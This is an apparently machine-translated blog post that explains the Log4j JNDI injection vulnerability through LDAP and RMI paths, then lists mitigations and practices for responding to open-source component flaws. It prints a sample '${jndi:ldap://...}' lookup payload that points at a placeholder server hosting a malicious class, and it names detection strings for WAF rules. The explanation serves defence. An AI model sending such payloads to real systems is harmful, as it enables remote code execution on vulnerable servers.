当前位置:网站首页>Information security - Epic vulnerability log4j vulnerability mechanism and preventive measures
Information security - Epic vulnerability log4j vulnerability mechanism and preventive measures
2022-07-06 15:46:00 【Empty one by one】
Recently, you r & D students must have been log4j The hole is terrible , In the morning 2 Click one after another to fix the vulnerability . And one version has been repaired , And burst out again and again 2.15,2.16 Loopholes bypass , Rise to 2.17 Version of . Bother 、 Bother 、 Bother .
experienced , We have to understand log4j What is the loophole , How was this vulnerability exploited , What are the consequences .
log4j There are two kinds of vulnerability mechanisms , Don't talk much , Upper figure ;
1. utilize log4j Trigger Ldap、 And make use of ldap Find the principle attack path
2. utilize log4j Trigger RMI Attack path
We usually keep logs :logger.inf("this is a log content"); This will be recorded in the log file this is a log content.
however log4j For some special , Such as :logger.info(${jndi:ldap://172.20.0.188:1099/evil});,log4j2 This line of string to be output will be parsed , It found... In the string ${, It has to be dealt with separately , Found to be JNDI Extended content .
Right again JNDI Further analysis , It was found that LDAP agreement ,LDAP The server 172.20.0.188:1099, You're looking for key yes evil, Then call the specific responsible LDAP To request the corresponding data . The problem is coming. !JNDI Support a method called named reference , That is to say JNDI It can be downloaded remotely class File to build objects !!! Load and build objects after downloading , We are such a big move that we are shocked .
If downloaded remotely URL It points to a hacker's server (http://172.20.0.188:80/excute.class), And downloaded class There is malicious code in the file , It's too late , Any consequence may occur , This is a JNDI Inject .
Protection and solution
1、 Check code , Upgrade to a safe version in time , This vulnerability also involves many Apache Open source project , This part should also be updated in time , Use the latest version 2.17.0.
2、 Malicious traffic may exist jndi:ladp:// jdni:rmi,IDS and WAF You can write corresponding rules to check out attack traffic from traffic ;
3、 add to jvm Launch parameters -Dlog4j2.formatMsgNoLookups=true
4、 Modify the configuration file log4j2.formatMsgNoLookups=True
5、 Modify environment variables FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS Set to true
6、 Turn off unnecessary internet requests ;
7、 Ban lookup or JNDI service ;
8、jdk Upgrade to the latest version ;
from log4j Thinking about loopholes in the construction of emergency response capacity
1. Open source components introduce specifications : Consider unification log4j And other open source components , We only need to introduce a few common versions , After safety inspection, it is stored in the company maven The private server library is for research and development , Other unverified versions are not allowed to be introduced ; If you need to quote private servers, consider going to approval 、 Enter after safety verification maven Private servers ;
2. Development model : The application of all component packages adopts java Rely on Management , Component dependency adopts rating pom Import ; Each time you upgrade components, you only need to upgrade the top pom, Other programs that use components only need to recompile and pull the latest package to complete the component upgrade , There is no need to change pom;
3.CICD Deploy the platform side : Deployment and startup of all programs , Both sides of the platform need to have control and response capabilities ; such as :java programmatic shell The startup script must be in CICD Partial platformization on the deployment platform , adopt CICD The platform can uniformly modify the startup command and complete the restart operation , Let the platform have the ability of rapid response ;
4. Asset platform side : It is necessary to clarify which applications have access to the Internet , What open source components do these applications use , What is the version of the corresponding open source component . Through the asset platform, we can quickly locate the risk status of existing applications ;
5. Code detection platform : Time match cve The vulnerable version in the open source component in is different from the existing version , And it can generate alarms and trigger alarm disposal process ;
6. From the perspective of zero trust , The zero trust platform is log4j Loopholes can play a role : With the help of the model of zero trust and only trust white list , All requirements for calling external interfaces from the company's intranet need to be filed on the zero trust platform , If an untrusted call chain is found , Trigger the alarm immediately ;
边栏推荐
- cs零基础入门学习记录
- Hospital privacy screen Industry Research Report - market status analysis and development prospect forecast
- Borg Maze (BFS+最小生成树)(解题报告)
- 【练习-7】Crossword Answers
- Cost accounting [23]
- Learning records: serial communication and solutions to errors encountered
- Stm32 dossiers d'apprentissage: saisie des applications
- 毕业才知道IT专业大学生毕业前必做的1010件事
- HDU-6025-Coprime Sequence(女生赛)
- D - Function(HDU - 6546)女生赛
猜你喜欢
ucore lab 2
动态规划前路径问题优化方式
UCORE Lab 1 system software startup process
C语言是低级和高级的分水岭
信息安全-史诗级漏洞Log4j的漏洞机理和防范措施
Eslint--- error: newline required at end of file but not found (EOL last) solution
学习记录:理解 SysTick系统定时器,编写延时函数
C语言学习笔记
STM32 learning record: play with keys to control buzzer and led
Learning records: serial communication and solutions to errors encountered
随机推荐
HDU-6025-Coprime Sequence(女生赛)
Cost accounting [13]
Find 3-friendly Integers
X-Forwarded-For详解、如何获取到客户端IP
ucore lab 2
【练习-3】(Uva 442)Matrix Chain Multiplication(矩阵链乘)
Eslint--- error: newline required at end of file but not found (EOL last) solution
Determine the Photo Position
Printing quality inspection and verification system Industry Research Report - market status analysis and development prospect forecast
Cost accounting [19]
Cost accounting [15]
MySQL授予用户指定内容的操作权限
Accounting regulations and professional ethics [5]
STM32 learning record: input capture application
Research Report of cylindrical grinder industry - market status analysis and development prospect forecast
Learning record: use STM32 external input interrupt
Learning record: how to perform PWM output
学习记录:如何进行PWM 输出
Accounting regulations and professional ethics [2]
Learning records: serial communication and solutions to errors encountered